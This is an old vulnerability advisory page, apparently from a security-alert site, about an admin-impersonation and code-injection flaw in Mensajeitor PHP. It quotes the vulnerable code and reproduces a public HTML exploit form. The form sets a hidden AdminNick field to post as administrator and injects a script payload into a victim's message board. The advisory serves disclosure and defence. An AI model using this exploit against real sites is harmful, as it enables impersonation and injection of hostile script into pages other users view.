Vulnerability details :
 
Mensajeitor Code Injection Admin Spoof 
 
     Fiche

Fiche créée le 2004-07-21 12:05:35, dernière mise à jour le 2008-03-02 23:48:46

Mensajeitor contains a flaw that will allow an attacker to post a message as an adminstrator. The problem is that there is no default value for the $AdminNick variable in mensajeitor.php causing checks to this variable to potentially be bypassed allowing an attacker to impersonate the administrator and post messages with higher privilegies.

Vulnerable code: for($i=0;$i".$nick.""; $AdminNick = "si"; } } if ($AdminNick != "si") { $cadena_final .= "$nick"; } As can be seen in the previous code, the default value for $AdminNick is not given, and if both checks fails no value is set by the code. This allows a remote attacker to set himself as part of the admin group by simply providing a default value for the $AdminNick parameter. This opens up the product to different types of attack, one of them is HTML and code injection attacks. Exploit code: < html> < head>< title>Mensajeitor Exploit < body> Inyeccion codigo en Mensajeitor =< v1.8.9 r1< br>< br> < form name="form1" method="post" action="http://www.victima.com/mensajeitor.php"> < input type="text" name="nick" size="10" value="Nick" maxlength="9">< br> < input type="text" name="titulo" size="21" value="Mensaje">< br> < input type="text" name="url" size="21" value="http://">< br> < input type="hidden" name="AdminNick" value="si">< br> Introduce codigo a insertar (
debe incluirse al principio)< br> < input type="text" name="cadena_final" size="75%" value="
< script>alert('hacked ;)')">< br> < input type="submit" name="enviar" value="Enviar" class="form">< br> MensajeitorPHP propiedad de aaff.< br> By Jordi Corrales (Shell Security Group, http://www.shellsec.net)

 
Mensajeitor    1.8.9 r1  Affected
Mensajeitor    1.8.9  Affected
Mensajeitor    1.8.6 r2  Affected
Mensajeitor    1.8.6  Affected
Mensajeitor    1.8.5  Affected
Mensajeitor    1.8  Affected
Mensajeitor    1.7  Affected
Mensajeitor    1.6.x  Not Affected
Mensajeitor    1.5.x  Not Affected
Mensajeitor    1.4.X  Not Affected
Mensajeitor    1.3.x  Not Affected
Mensajeitor    1.0  Not Affected
 
Attack Type :  Input Manipulation
 XSS, SQL injection, file retrieval, directory traversal, overflows, URL encoding.
 Découvert le 2004-07-21 12:10:36
 
Disclosure :  OSVDB Verified
 Confirmé le 2004-07-21 12:10:36
 
Exploit :  Exploit Public
 Exploit découvert le 2004-07-21 12:13:00
 
Impact :  Loss of Integrity
 Assurance that data is unaltered by unauthorized persons. Examples: XSS, arbitrary command execution, most overflows, most format strings, SQL injection, unauthorized file modification/deletion/creation, remote file inclusion, etc.
 
Location :  Remote / Network Access
 If network access if required and exploit can be done remotely.
 
 
External refs :
OSVDB  8124
  
  
  
  
  
 
 
 
 

 

 


Free consultation (search)
 
  Fill one or some of the fields below :
   
Vendor
 
Title
 
Vulnerability ref.
 
 
   
 
   
Individual alerts
 
You determine with one profile dynamic and assisted, all your material and software equipment.
We shall inform you then automatically, as soon as a notification of security will concern one or several elements of it profile.
Every notification is definite, consists of numerous information to determine risk and to protect itself from it.
 
Login:
Pass:
 
Free online subscription
© Power4Security.com - BMS Ltd UK 2007-2008 - powered by Power4Website.com